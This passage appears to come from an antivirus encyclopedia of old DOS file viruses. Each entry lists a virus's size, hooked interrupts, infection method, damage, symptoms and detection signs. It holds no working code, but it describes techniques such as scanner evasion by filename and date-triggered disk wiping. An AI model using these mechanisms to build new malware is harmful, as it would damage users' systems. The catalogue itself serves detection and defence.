  12198. Virus Length: 800 bytes (file), 832 bytes (memory)
  12199.  
  12200. PC Vectors Hooked: INT 09h and 21h
  12201.  
  12202. Infection Process:
  12203. The first time a program infected with November 17th is executed,
  12204. the virus will install itself memory resident at the top of the
  12205. system memory but below the 640K DOS boundary.
  12206.  
  12207. Damage: Virus destroys the hard disk's FAT. When the value of [00:46E]
  12208. is changed and the month = 1, the virus will then write garbage
  12209. onto the current disk from sectors 1 to 8.
  12210.  
  12211. Symptoms: File sizes increase by 800 bytes. Decreased available
  12212. memory by 800 bytes.
  12213.  
  12214. [Protovir]
  12215. Virus Name: PROTOVIR
  12216. Virus Type: File Virus (COM files), resides in HiMem
  12217. Virus Length: 730 bytes (file), 270 bytes (memory)
  12218.  
  12219. PC Vectors Hooked: INT 21h
  12220.  
  12221. Infection Process:
  12222. Virus infects .COM  programs when they are executed. Infected
  12223. files will have a file length increase of 730 bytes with the
  12224. virus being located at the end of the file. Virus updates the
  12225. first 7 bytes, makes the file head point to the virus code, and
  12226. reserves the first 7 bytes at the end of the infected file.
  12227.  
  12228. Damage: Increased file sizes. Decreased available memory.
  12229.  
  12230. Symptoms: Available free memory will decrease by 720 bytes.
  12231.  
  12232. [Red Spider]
  12233. Virus Name: RED SPIDER
  12234. Virus Type: File Virus
  12235.             Virus infects .COM files that are between 2,000
  12236.             (7D0H) and 63,500 (F80CH) bytes in length. Infect
  12237.             .EXE files that are smaller than 524,288 (80000H)
  12238.             byte. Virus is a Memory Block Resident.
  12239. Virus Length: 949-964 bytes (file)
  12240.  
  12241. PC Vectors Hooked: INT 21h
  12242.  
  12243. Infection Process:
  12244. Virus stays resident at the top of the MCB (memory control block)
  12245. but below the DOS 640k boundary. Virus infects .EXE and .COM
  12246. programs when they are executed. Infected files will have a file
  12247. length increase of 949 - 964 bytes with the virus being located
  12248. at the end of the file.
  12249.  
  12250. Damage: Increased file sizes.  Decreased available memory.
  12251.  
  12252. Symptoms: The available free memory decreases by 976 bytes.
  12253.  
  12254. Note: If COMMAND.COM is infected, the file length will not
  12255. change. This virus will not infect. The following text strings
  12256. can be found encrypted in the virus code:
  12257.  
  12258.     "Red Spider Virus created by Garfield from Zielona Gora in
  12259.      Feb 1993 ....... "
  12260.  
  12261. [Hello Shshtay]
  12262. Virus Name: HELLO-SHSHTAY
  12263. Virus Type: File Virus
  12264.             Virus infects .COM files shorter than 63,776 bytes and
  12265.             .EXE files shorter than 52,428 bytes. Virus is a
  12266.             Memory Block Resident.
  12267. Virus Length: 1,840-1,855 bytes (EXE), 1,600-1615 bytes (COM),
  12268.               1792 bytes (memory)
  12269. PC Vectors Hooked: INT 21h
  12270.  
  12271. Infection Process:
  12272. Virus stays resident at the top of the MCB (memory control block)
  12273. but below the DOS 640k boundary. The available free memory
  12274. decreases by 1792 bytes. Virus infects .EXE and .COM programs
  12275. when they are executed. Infected .EXE files will have a file
  12276. length increase of 1840-1855 bytes and infected .COM files will
  12277. have a file length increase of 1600-1615 bytes with the virus
  12278. being located at the end of the file in both cases.
  12279.  
  12280. Damage: Increased file sizes.  Decreased available memory.
  12281.  
  12282. Symptoms: Virus displays the following messages:
  12283.  
  12284.         "HELLO SHSHTAY"
  12285.         "GODBYE AMIN "
  12286.         "HELLO SHSHTAY"
  12287.         " ZAGAZIG UNIV"
  12288.  
  12289. Note: If the system date is greater than or equal to January,
  12290. 1994, it will hook INT 1Ch, INT 09h and set a counter = 0.
  12291. Interrupt 1ch will add one to the counter 18.2 times every second
  12292. and when the counter is greater than or equal to 3786 (ECAh) it
  12293. will trigger INT 09h and reset the counter back to 0. When
  12294. Interrupt 09h is activated, it will put a message into the
  12295. keyboard buffer, so around every 208 (3786/18.2) seconds, the
  12296. screen will display one message in turn from the above list.
  12297.  
  12298. [Star Dot]
  12299. Virus Name: STARDOT
  12300. Virus Type: File Virus (EXE files)
  12301. Virus Length: 592-608 bytes (file)
  12302.  
  12303. PC Vectors Hooked: INT 21h
  12304.  
  12305. Infection Process:
  12306. Virus only infects .EXE programs when they are executed. There
  12307. will be a file length increase of 592 - 608 bytes  with the virus
  12308. being located at the end of the file. When the virus infects
  12309. another clean program, it adds a counter and writes the value and
  12310. virus body into a clean program, so the virus will get the day of
  12311. the week and compare with the lowest 3 bits of the counter. If
  12312. the values are equal, it will randomly destroy the current disk
  12313. sector 8 times. If the counter value is equal to 63 (3Fh), it
  12314. will send the random data to the system I/O port (from 380h to 3DFh).
  12315.  
  12316. Damage: Virus destroys current disk sector and sends random data
  12317. to the system I/O port.
  12318.  
  12319. Symptoms: Data loss on the disk and increased file sizes.
  12320.  
  12321. [Stunning Blow]
  12322. Virus Name: STUNNING BLOW
  12323. Virus Type: File Virus
  12324.             Virus infects .EXE files not starting with the following
  12325.             letters: "TB","F-","CP","NA","SC","CL","V." Virus is a
  12326.             Memory Block Resident.
  12327. Virus Length: 1237 bytes (file), 1392 bytes (memory)
  12328.  
  12329. PC Vectors Hooked: INT 21h
  12330.  
  12331. Infection Process:
  12332. This virus will activate on the 4, 8, 12, 16, 20, 24, and 28  of
  12333. each month, after the initial delay period of one month.  Upon
  12334. activation the virus will:
  12335. (1) Hook interrupt 08h, counter = FFD0h
  12336. (2) Decrease the counter by 18.2 every second, and
  12337. (3) When the counter reaches zero it will start to play music on
  12338.     the speaker. This virus also activates when a random seed =
  12339.     -1, and it will display the following message:
  12340.  
  12341.     " Stunning Blow (R) Ghost Player Italy."
  12342.  
  12343. Damage: Virus deletes *.CPS files.
  12344.  
  12345. Symptoms: Loss of some files named *.CPS and increased file
  12346. sizes. Decreased available memory.
  12347.  
  12348. [Sunrise]
  12349. Virus Name: SUNRISE
  12350. Virus Type: File Virus (EXE files)
  12351. Virus Length: 1033 bytes (file), 80 bytes (memory)
  12352.  
  12353. PC Vectors Hooked: INT 21h
  12354.  
  12355. Infection Process:
  12356. From the root directory of the current disk, the virus searches for
  12357. the last subdirectory then changes to that subdirectory and all
  12358. subsequent last subdirectories. The virus then searches to infect an
  12359. uninfected *.EXE file. The virus checks the disk serial number. If the
  12360. number is equal to zero and one memory word is equal to 2Dh, it will
  12361. display the following message:
  12362.  
  12363.     "* Sun Rise * EpidemicWare G.I.P.Po oct-93."
  12364.  
  12365. Interrupt 08h will be hooked: If the month when the executed file
  12366. was infected is not equal to the current month, the virus will
  12367. hook int 08h, which will:
  12368.   (i) Be resident at the top of the memory but below the 640k
  12369.       boundary.
  12370.  (ii) Decrease available memory by 80 bytes.
  12371. (iii) Assign a value of BDD8h to a counter and decrease the counter
  12372.       by 18.2 every second. When the counter reaches zero the
  12373.       screen will blank out and the original screen contents will
  12374.       then scroll up. After this, the system returns to normal
  12375.       operation.
  12376.  (iv) Assign a value of 1518h to the counter and repeat steps (ii),
  12377.       (iii) and (iv).
  12378.  
  12379. Damage: Virus hooks int 8h and at certain intervals the screen
  12380. goes blank and scrolls up.
  12381.  
  12382. Symptoms: Increased file sizes.  Decreased available memory.
  12383.  
  12384. [Thule]
  12385. Virus Name: THULE
  12386. Virus Type: File Virus
  12387.             Virus infects .COM files shorter than 61,054 bytes.
  12388.             Virus is a Memory Block Resident.
  12389. Virus Length: 309 (COM files), 68 bytes (memory)
  12390.  
  12391. PC Vectors Hooked: INT 21h
  12392.  
  12393. Infection Process:
  12394. This virus will move the virus code to 0:200h-0:243h and hook int 21h
  12395. in order to delete a file named "THULE.COM."  When DOS changes
  12396. the current directory, it will try to open "THULE.COM" on the
  12397. current directory. When found, this file will be deleted.
  12398.  
  12399. Damage: The file named "THULE.COM" will be deleted.
  12400.  
  12401. Symptoms: Increased file sizes. A file is deleted.
  12402.  
  12403. [Topa 1.20]
  12404. Virus Name: TOPA 1.20
  12405. Virus Type: File Virus
  12406.             Virus infects .COM files between 2712 and 60000
  12407.             bytes. Infects .EXE files between 5424 and 524288
  12408.             bytes.  Virus is a Memory Block Resident.
  12409. Virus Length: 2456-2471 bytes (EXE files), 2456 bytes (COM files),
  12410.               5536 bytes (memory)
  12411.  
  12412. PC Vectors Hooked: INT 1Ch, INT 21h
  12413.  
  12414. Infection Process:
  12415. This virus is spread by executing an infected program. When a
  12416. TOPA_1.2 infected program is executed, it will check to see if
  12417. AX= 4290h, INT 21 and return AX = 9047 indicate it is already
  12418. resident in the memory. If it is, the virus will execute the
  12419. infected program. If not, the virus will perform the following:
  12420. 1) It will change memory allocate strategy to low memory last
  12421.    fit, then stay resident at the MCB (memory control block). The
  12422.    available free memory will decrease by 5536 (15A0H) bytes.
  12423. 2) Once the TOPA_1.2 virus is memory resident, it will hook int
  12424.    1Ch and int 21h in order to infect files.
  12425.  
  12426. Damage: Decreased available memory.
  12427.  
  12428. Symptoms: Increased file sizes.
  12429.  
  12430. [Topo]
  12431. Virus Name: TOPO
  12432. Virus Type: File Virus
  12433.             Virus infects .EXE files shorter than 524288 bytes.
  12434.             Virus is a Memory Block Resident.
  12435. Virus Length: 1536-1552 bytes (file), 3616 bytes (memory)
  12436.  
  12437. PC Vectors Hooked: INT 21h
  12438.  
  12439. Infection Process:
  12440. This virus is spread by executing an infected program. When a
  12441. TOPO infected program is executed, first it will hook INT 3 then
  12442. use this interrupt to deceive the virus body.  The virus will
  12443. then check to see if it is already resident in the memory by
  12444. checking if address 0:3feh contains the value 0011h. If the virus
  12445. is already in the memory it will execute the infected program. The
  12446. virus will not include files named: *AN.EXE and *LD.EXE, with "*"
  12447. being a wild card.
  12448.  
  12449. Damage: Virus destroys the diskette parameter (00:525h - 0:52Ch) and
  12450. displays the following message:
  12451.  
  12452.     "R(etry), I(gnore), F(ail), or A(bort) ?"
  12453.  
  12454. Symptoms: Increased file sizes and the inability to read certain
  12455. files. Decreased available memory.
  12456.  
  12457. Note: If the system date is equal to 25 or 26 of any month,
  12458. the above message will appear.
  12459.  
  12460. [Bloody Warrior]
  12461. Virus Name:  BLOODY-WARRIOR
  12462. Virus Type:  Resident at the top of the MCB
  12463.              (memory control block)
  12464. Virus Length: 1344 bytes (file), 2768 bytes (memory)
  12465.  
  12466. PC Vectors Hooked:
  12467.  
  12468. Execution Procedure:
  12469. The virus infects COM and EXE files as long as the COM file is
  12470. smaller than EA60h bytes. It will not infect the following
  12471. files: "SCAN", "STOP", "SHIELD", "CLEAN", "CV", "DEBUG", "TD."
  12472. This virus can only spread by executing an infected program.
  12473.  
  12474. Damage:
  12475. The virus destroys the disk sector from sector 1 to 256. By progressive
  12476. action: it will write garbage to the current disk from sectors 1
  12477. to 256 when it is the fourth or later in the month of July.
  12478.  
  12479. Detection method:
  12480. Infected files increase by 1344 bytes.
  12481.  
  12482. Symptoms:
  12483. When a BLOODY-WARRIOR infected program is executed it will be:
  12484. 1. Resident at the top of the system memory but below the 640k DOS
  12485.    boundary. The available free memory will decrease by 2768 bytes.
  12486. 2. Interrupt 21h will be hooked: When the BLOODY-WARRIOR virus is
  12487.    memory resident, in order to infect the files the virus will
  12488.    control the following functions:
  12489.         - loading and executing (AX=4B00h)
  12490.         - opening (AH=3Dh)
  12491.         - get and set file attribute (AH=43h)
  12492.         - rename a file (AH = 56h)
  12493.    It will infect EXE and COM files when they are executed, opened,
  12494.    when getting file attributes, or when renaming files.  But it
  12495.    will not infect COM files if the length is greater than EA60h
  12496.    bytes. Infected programs will have a file length increase of
  12497.    1344 bytes with the virus being located at the end of the
  12498.    file. If file header is : "SCAN","STOP", "SHIELD", "CLEAN",
  12499.    "CV", "DEBUG", or "TD" the virus will not infect these files
  12500.    but will instead restore int 21h to the original interrupt
  12501.    vector so these files will not be able to detect the virus.
  12502. 3. This virus will only activate in July, when the date is the
  12503.    4th or later. It will write garbage to the current disk from
  12504.    sectors 1 to 256. The garbage data includes the follow message"
  12505.  
  12506.  
  12507.                "Hello, world!
  12508.                I am the Bloody Warrior.
  12509.                Nice to meet you.
  12510.                What about this virus ? Funny ?
  12511.                There is no hope for you.
  12512.                This virus was released in Milan
  12513.                1993."
  12514.  
  12515. Note: There is a possibility of detection when using DOS commands.
  12516.  
  12517. [17690]
  12518. Virus Name: 17690
  12519. Virus Type: File Virus (EXE files)
  12520. Virus Length:  17,690 bytes
  12521.  
  12522. Execution Procedure:
  12523. 1) There is a 10% chance that the virus will infect a file. The
  12524.    method of infection is: virus searches for an EXE file on
  12525.    diskette A. Then renames this file and creates a new COM file
  12526.    with the same name as the original EXE file. This new COM
  12527.    file is the virus.
  12528. 2) When the virus does not infect files, it will execute the program
  12529.    that has been renamed. User will not see any unusual
  12530.    manifestation.
  12531.  
  12532. Damage: None
  12533.  
  12534. Detection method: Infected files increase by 17,690 bytes.
  12535.  
  12536. [Fish 1100]
  12537. Virus Name: Fish-1100
  12538. Virus Type: File Virus (COM files)
  12539. Virus Length:  1100 bytes
  12540.  
  12541. PC Vectors Hooked: INT 21h, INT 24h
  12542.  
  12543. Execution Procedure:
  12544. 1) Checks whether it is memory resident. If not, it loads itself
  12545.    resident in the high memory.
  12546. 2) Hooks INT 21h and goes back to the original routine.
  12547.  
  12548. Infection Procedure:
  12549. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12550.    prevent divulging its trace when writing. If the program to be
  12551.    executed is an uninfected COM file, the virus proceeds to infect it.
  12552.  
  12553. Damage: None
  12554.  
  12555. Detection method: Infected files increase by 1100 bytes.
  12556.  
  12557. [Fish 2420]
  12558. Virus Name: Fish-2420
  12559. Virus Type: File Virus (COM files)
  12560. Virus Length:  2420 bytes
  12561.  
  12562. PC Vectors Hooked: INT 21h, INT 24h
  12563.  
  12564. Execution Procedure:
  12565. 1) Checks whether it is memory resident. If not, it loads itself
  12566.    resident in the high memory.
  12567. 2) Hooks INT 21h and goes back to the original routine.
  12568.  
  12569. Infection Procedure:
  12570. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12571.    prevent divulging its trace when writing. If the program to be
  12572.    executed is an uninfected COM file, the virus proceeds to infect it.
  12573.  
  12574. Damage: None
  12575.  
  12576. Detection method: Infected files increase by 2420 bytes.
  12577.  
  12578. [Small 178]
  12579. Virus Name: Small-178
  12580. Virus Type: File Virus (COM files)
  12581. Virus Length:  178 bytes
  12582.  
  12583. PC Vectors Hooked: INT 21h
  12584.  
  12585. Execution Procedure:
  12586. 1) Checks whether it is memory resident. If not, it loads itself
  12587.    resident in the high memory.
  12588. 2) Hooks INT 21h and goes back to the original routine.
  12589.  
  12590. Infection Procedure:
  12591. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12592.    is an uninfected COM file, the virus proceeds to infect it.
  12593.  
  12594. Damage: None
  12595.  
  12596. Note: An error message appears when writing because INT 24h has not
  12597. been hanged.
  12598.  
  12599. Detection method: Infected files increase by 178 bytes.
  12600.  
  12601. [Shiny-Happy]
  12602. Virus Name: Shiny-Happy
  12603. Virus Type: File Virus (EXE files)
  12604. Virus Length:  921 bytes
  12605.  
  12606. PC Vectors Hooked: INT 21h
  12607.  
  12608. Execution Procedure:
  12609. 1) Checks whether it is memory resident. If not, it loads itself
  12610.    resident in the high memory.
  12611. 2) Hooks INT 21h and goes back to the original routine.
  12612.  
  12613. Infection Procedure:
  12614. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  12615.    executed is an uninfected EXE file, the virus proceeds to infect it.
  12616.  
  12617. Damage: None
  12618.  
  12619. Detection method: Infected files increase by 921 bytes.
  12620.  
  12621. [Sucker]
  12622. Virus Name: Sucker
  12623. Virus Type: File Virus (EXE files)
  12624. Virus Length:  572 bytes
  12625.  
  12626. PC Vectors Hooked: INT 21h
  12627.  
  12628. Execution Procedure:
  12629. 1) Checks whether it is memory resident. If not, it loads itself
  12630.    resident in the high memory.
  12631. 2) Hooks INT 21h and goes back to the original routine.
  12632.  
  12633. Infection Procedure:
  12634. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12635.    is an uninfected EXE file, the virus proceeds to infect it.
  12636.  
  12637. Damage: None
  12638.  
  12639. Note:
  12640. 1) An error message appears when writing because INT 24h has not been
  12641.    hanged.
  12642. 2) This virus can be cleared with Soft-Mice. Virus will make a
  12643.    mistake in clearing SUCKER.CO..
  12644.  
  12645. Detection method: Infected files increase by 572 bytes.
  12646.  
  12647. [Data-Rape-2.0]
  12648. Virus Name: Data-Rape-2.0
  12649. Virus Type: File Virus (COM and EXE files)
  12650. Virus Length:  1875-1890 bytes
  12651.  
  12652. PC Vectors Hooked: INT 21h
  12653.  
  12654. Execution Procedure:
  12655. 1) Checks whether it is memory resident. If not, it loads itself
  12656.    resident in the high memory.
  12657. 2) Hooks INT 21h and goes back to the original routine.
  12658.  
  12659. Infection Procedure:
  12660. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12661.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  12662.  
  12663. Damage: None
  12664.  
  12665. Detection method: Infected files increase by 1875-1890 bytes.
  12666.  
  12667. [Flagyll]
  12668. Virus Name: Flagyll
  12669. Virus Type: File Virus (EXE files)
  12670. Virus Length:
  12671.  
  12672. PC Vectors Hooked: INT 21h
  12673.  
  12674. Execution Procedure:
  12675. 1) Checks whether it is memory resident. If not, it loads itself
  12676.    resident in the high memory.
  12677. 2) Hooks INT 21h and goes back to the original routine.
  12678.  
  12679. Infection Procedure:
  12680. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12681.    is an uninfected EXE file, the virus proceeds to infect it.
  12682.  
  12683. Damage: It overwrites the original files with the virus code, thus
  12684. corrupting the files.
  12685.  
  12686. Note: An error message appears when writing because INT 24h has not
  12687. been hanged.
  12688.  
  12689. [X-3B]
  12690. Virus Name: X-3B
  12691. Virus Type: File Virus (COM and EXE files)
  12692. Virus Length:  1060 bytes
  12693.  
  12694. PC Vectors Hooked: INT 21h
  12695.  
  12696. Execution Procedure:
  12697. 1) Checks whether it is memory resident. If not, it loads itself
  12698.    resident in the high memory.
  12699. 2) Hooks INT 21h and goes back to the original routine.
  12700.  
  12701. Infection Procedure:
  12702. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12703.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  12704.  
  12705. Damage: None
  12706.  
  12707. Detection method: Infected files increase by 1060 bytes.
  12708.  
  12709. [Math-Test]
  12710. Virus Name: Math-Test
  12711. Virus Type: File Virus (COM and EXE files)
  12712. Virus Length:  1136 bytes
  12713.  
  12714. PC Vectors Hooked: INT 21h
  12715.  
  12716. Execution Procedure:
  12717. 1) Checks whether it is memory resident. If not, it loads itself
  12718.    resident in the high memory.
  12719. 2) Hooks INT 21h and goes back to the original routine.
  12720.  
  12721. Infection Procedure:
  12722. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12723.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  12724.  
  12725. Damage: None
  12726.  
  12727. Note: An error message appears when writing because INT 24h has not
  12728. been hanged.
  12729.  
  12730. Detection method: Infected files increase by 1136 bytes.
  12731.  
  12732. [Not-586]
  12733. Virus Name: Not-586
  12734. Virus Type: File Virus (COM files)
  12735. Virus Length:  586 bytes
  12736.  
  12737. PC Vectors Hooked: INT 21h, INT 24h
  12738.  
  12739. Execution Procedure:
  12740. 1) Checks whether it is memory resident. If not, it loads itself
  12741.    resident in the high memory.
  12742. 2) Hooks INT 21h and goes back to the original routine.
  12743.  
  12744. Infection Procedure:
  12745. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12746.    prevent divulging its trace when writing. If the program to be
  12747.    executed is an uninfected COM file, the virus proceeds to infect it.
  12748.  
  12749. Damage: None
  12750.  
  12751. Detection method: Infected files increase by 586 bytes.
  12752.  
  12753. [Xoana]
  12754. Virus Name: Xoana
  12755. Virus Type: File Virus (EXE files)
  12756. Virus Length:  1670 bytes
  12757.  
  12758. PC Vectors Hooked: INT 21h
  12759.  
  12760. Execution Procedure:
  12761. 1) Checks whether it is memory resident. If not, it loads itself
  12762.    resident in the high memory.
  12763. 2) Hooks INT 21h and goes back to the original routine.
  12764.  
  12765. Infection Procedure:
  12766. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12767.    is an uninfected EXE file, the virus proceeds to infect it.
  12768.  
  12769. Damage: None
  12770.  
  12771. Note: An error message appears when writing because INT 24h has not
  12772. been hanged.
  12773.  
  12774. Detection method: Infected files increase by 1670 bytes.
  12775.  
  12776. [Pit-1228]
  12777. Virus Name: Pit-1228
  12778. Virus Type: File Virus (COM and EXE files)
  12779. Virus Length:  1228 bytes
  12780.  
  12781. PC Vectors Hooked: INT 21h, INT 24h
  12782.  
  12783. Execution Procedure:
  12784. 1) Checks whether it is memory resident. If not, it loads itself
  12785.    resident in the high memory.
  12786. 2) Hooks INT 21h and goes back to the original routine.
  12787.  
  12788. Infection Procedure:
  12789. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12790.    prevent divulging its trace when writing. If the program to be
  12791.    executed is an uninfected COM or EXE file, the virus proceeds to
  12792.    infect it.
  12793.  
  12794. Damage: None
  12795.  
  12796. Detection method: Infected files increase by 1228 bytes.
  12797.  
  12798. [Finnish-357]
  12799. Virus Name: Finnish-357
  12800. Virus Type: File Virus (COM files)
  12801. Virus Length:  709 BYTES
  12802.  
  12803. PC Vectors Hooked: INT 21h
  12804.  
  12805. Execution Procedure:
  12806. 1) Checks whether it is memory resident. If not, it loads itself
  12807.    resident in the high memory.
  12808. 2) Hooks INT 21h and checks whether COMMAND.COM that booted up the
  12809.    system is infected. If not, the virus infects it and goes back to
  12810.    the original routine.
  12811.  
  12812. Infection Procedure:
  12813. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12814.    is an uninfected COM file, the virus proceeds to infect it.
  12815.  
  12816. Detection method: Infected files increase by 709 bytes.
  12817.  
  12818. [TU-482]
  12819. Virus Name: Tu-482
  12820. Virus Type: File Virus (COM files)
  12821. Virus Length:  482 bytes
  12822.  
  12823. PC Vectors Hooked: INT 21h
  12824.  
  12825. Execution Procedure:
  12826. 1) Checks whether it is memory resident. If not, it loads itself
  12827.    resident in the high memory.
  12828. 2) Hooks INT 21h and goes back to the original routine.
  12829.  
  12830. Infection Procedure:
  12831. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12832.    is an uninfected COM file, the virus proceeds to infect it.
  12833.  
  12834. Damage: None
  12835.  
  12836. Note:
  12837. 1) An error message appears when writing because INT 24h has not been
  12838.    hanged.
  12839. 2) When the virus is executed, it jumps to the end of the program, then
  12840.    jumps back to the beginning making it difficult to locate.
  12841.  
  12842. Detection method: Infected files increase by 482 bytes.
  12843.  
  12844. [Uruk-Hai]
  12845. Virus Name: Uruk-Hai
  12846. Virus Type: File Virus (COM files)
  12847. Virus Length:  394 bytes
  12848.  
  12849. PC Vectors Hooked: INT 21h, INT 24h
  12850.  
  12851. Execution Procedure:
  12852. 1) Checks whether it is memory resident. If not, it loads itself
  12853.    resident in the high memory.
  12854. 2) Hooks INT 21h and goes back to the original routine.
  12855.  
  12856. Infection Procedure:
  12857. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12858.    prevent divulging its trace when writing. If the program to be
  12859.    executed is an uninfected COM file, the virus proceeds to infect it.
  12860.  
  12861. Damage: None
  12862.  
  12863. Detection method: Infected files increase by 394 bytes.
  12864.  
  12865. [V-388]
  12866. Virus Name: V-388
  12867. Virus Type: File Virus (COM files)
  12868. Virus Length:  394 bytes
  12869.  
  12870. PC Vectors Hooked: INT 21h, INT 24h
  12871.  
  12872. Execution Procedure:
  12873. 1) Checks whether it is memory resident. If not, it loads itself
  12874.    resident in the high memory.
  12875. 2) Hooks INT 21h and goes back to the original routine.
  12876.  
  12877. Infection Procedure:
  12878. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12879.    prevent divulging its trace when writing. If the program to be
  12880.    executed is an uninfected COM file that ends with INT 21(AH=4Ch),
  12881.    the virus proceeds to infect it.
  12882.  
  12883. Damage: None
  12884.  
  12885. Detection method: Infected files increase by 394 bytes.
  12886.  
  12887. [Wizard 3.0]
  12888. Virus Name: Wizard-3.0
  12889. Virus Type: File Virus (COM files)
  12890. Virus Length:  268 bytes
  12891.  
  12892. PC Vectors Hooked: INT 21h
  12893.  
  12894. Execution Procedure:
  12895. 1) Checks whether it is memory resident. If not, it loads itself
  12896.    resident in the high memory.
  12897. 2) Hooks INT 21h and goes back to the original routine.
  12898.  
  12899. Infection Procedure:
  12900. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12901.    is an uninfected COM file, the virus proceeds to infect it.
  12902.  
  12903. Damage: None
  12904.  
  12905. Note: An error message appears when writing because INT 24h has not
  12906. been hanged.
  12907.  
  12908. Detection method: Infected files increase by 268 bytes.
  12909.  
  12910. [Semtex]
  12911. Virus Name: Semtex
  12912. Virus Type: File Virus (COM files)
  12913. Virus Length:  1000 bytes
  12914.  
  12915. PC Vectors Hooked: INT 21h
  12916.  
  12917. Execution Procedure:
  12918. 1) Checks whether it is memory resident. If not, it loads itself
  12919.    resident in the high memory.
  12920. 2) Hooks INT 21h and INT 8h, then goes back to the original routine.
  12921.  
  12922. Infection Procedure:
  12923. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12924.    is an uninfected COM file, the virus proceeds to infect it.
  12925.  
  12926. Damage: None
  12927.  
  12928. Note:
  12929. 1) An error message appears when writing because INT 24h has not been
  12930.    hanged.
  12931. 2) At the beginning of an infected file, the following can be found:
  12932.  
  12933.                    MOV     BP,XXXX
  12934.                    JMP     BP
  12935.  
  12936. Detection method: Infected files increase by 1000 bytes.
  12937.  
  12938. [1720]
  12939. Virus Name: 1720
  12940. Virus Type: File Virus (COM files)
  12941. Virus Length:  1723 bytes
  12942.  
  12943. PC Vectors Hooked: INT 21h, INT 24h
  12944.  
  12945. Execution Procedure:
  12946. 1) Checks whether it is memory resident. If not, it loads itself
  12947.    resident in the high memory.
  12948. 2) Hooks INT 21h and goes back to the original routine.
  12949.  
  12950. Infection Procedure:
  12951. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12952.    prevent divulging its trace when writing. If the program to be
  12953.    executed is an uninfected COM file, the virus proceeds to infect it.
  12954.  
  12955. Damage: None
  12956.  
  12957. Detection method: Infected files increase by 1723 bytes.
  12958.  
  12959. [Number 6]
  12960. Virus Name: Number6
  12961. Virus Type: File Virus (COM files)
  12962. Virus Length:  631 bytes
  12963.  
  12964. PC Vectors Hooked: INT 21h, INT 24h
  12965.  
  12966. Execution Procedure:
  12967. 1) Checks whether it is memory resident. If not, it loads itself
  12968.    resident in the high memory.
  12969. 2) Hooks INT 21h and goes back to the original routine.
  12970.  
  12971. Infection Procedure:
  12972. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  12973.    prevent divulging its trace when writing. If the program to be
  12974.    executed is an uninfected COM file, the virus proceeds to infect it.
  12975.  
  12976. Damage: None
  12977.  
  12978. Detection method: Infected files increase by 631 bytes.
  12979.  
  12980. [Timemark]
  12981. Virus Name: Timemark
  12982. Virus Type: File Virus (EXE files)
  12983. Virus Length:  1060-1080 bytes
  12984.  
  12985. PC Vectors Hooked: INT 21h
  12986.  
  12987. Execution Procedure:
  12988. 1) Checks whether it is memory resident. If not, it loads itself
  12989.    resident in the high memory.
  12990. 2) Hooks INT 21h and goes back to the original routine.
  12991.  
  12992. Infection Procedure:
  12993. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  12994.    is an uninfected EXE file, the virus proceeds to infect it.
  12995.  
  12996. Damage: None
  12997.  
  12998. Detection method: Infected files increase by 1060-1080 bytes.
  12999.  
  13000. [Sergant]
  13001. Virus Name: Sergant
  13002. Virus Type: File Virus (COM files)
  13003. Virus Length:  108 bytes
  13004.  
  13005. PC Vectors Hooked: INT 21h
  13006.  
  13007. Execution Procedure:
  13008. 1) Checks whether it is memory resident. If not, it loads itself
  13009.    resident in the high memory.
  13010. 2) Hooks INT 21h and goes back to the original routine.
  13011.  
  13012. Infection Procedure:
  13013. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13014.    is an uninfected COM file, the virus proceeds to infect it.
  13015.  
  13016. Damage: None
  13017.  
  13018. Note: An error message appears when writing because INT 24h has not
  13019. been hanged.
  13020.  
  13021. Detection method: Infected files increase by 108 bytes.
  13022.  
  13023. [Penza]
  13024. Virus Name: Penza
  13025. Virus Type: File Virus (COM files)
  13026. Virus Length:  700 bytes
  13027.  
  13028. PC vectors Hooked: INT 21h, INT 24h
  13029.  
  13030. Execution Procedure:
  13031. 1) Checks whether it is memory resident. If not, it loads itself
  13032.    resident in the high memory.
  13033. 2) Hooks INT 21h and goes back to the original routine.
  13034.  
  13035. Infection Procedure:
  13036. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  13037.    prevent divulging its trace when writing. If the program to be
  13038.    executed is an uninfected COM file, the virus proceeds to infect it.
  13039.  
  13040. Damage: None
  13041.  
  13042. Detection method: Infected files increase by 700 bytes.
  13043.  
  13044. [Nines]
  13045. Virus Name: Nines
  13046. Virus Type: File Virus (COM files)
  13047. Virus Length:  706 or 776 bytes
  13048.  
  13049. PC Vectors Hooked: INT 21h
  13050.  
  13051. Execution Procedure:
  13052. 1) Checks whether it is memory resident. If not, it loads itself
  13053.    resident in the high memory.
  13054. 2) Hooks INT 21h and goes back to the original routine.
  13055.  
  13056. Infection Procedure:
  13057. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  13058.    is an uninfected COM file, the virus proceeds to infect it.
  13059.  
  13060. Damage: None
  13061.  
  13062. Note: An error message appears when writing because INT 24h has not
  13063. been hanged.
  13064.  
  13065. Detection method: Infected files increase by 706 or 776 bytes.
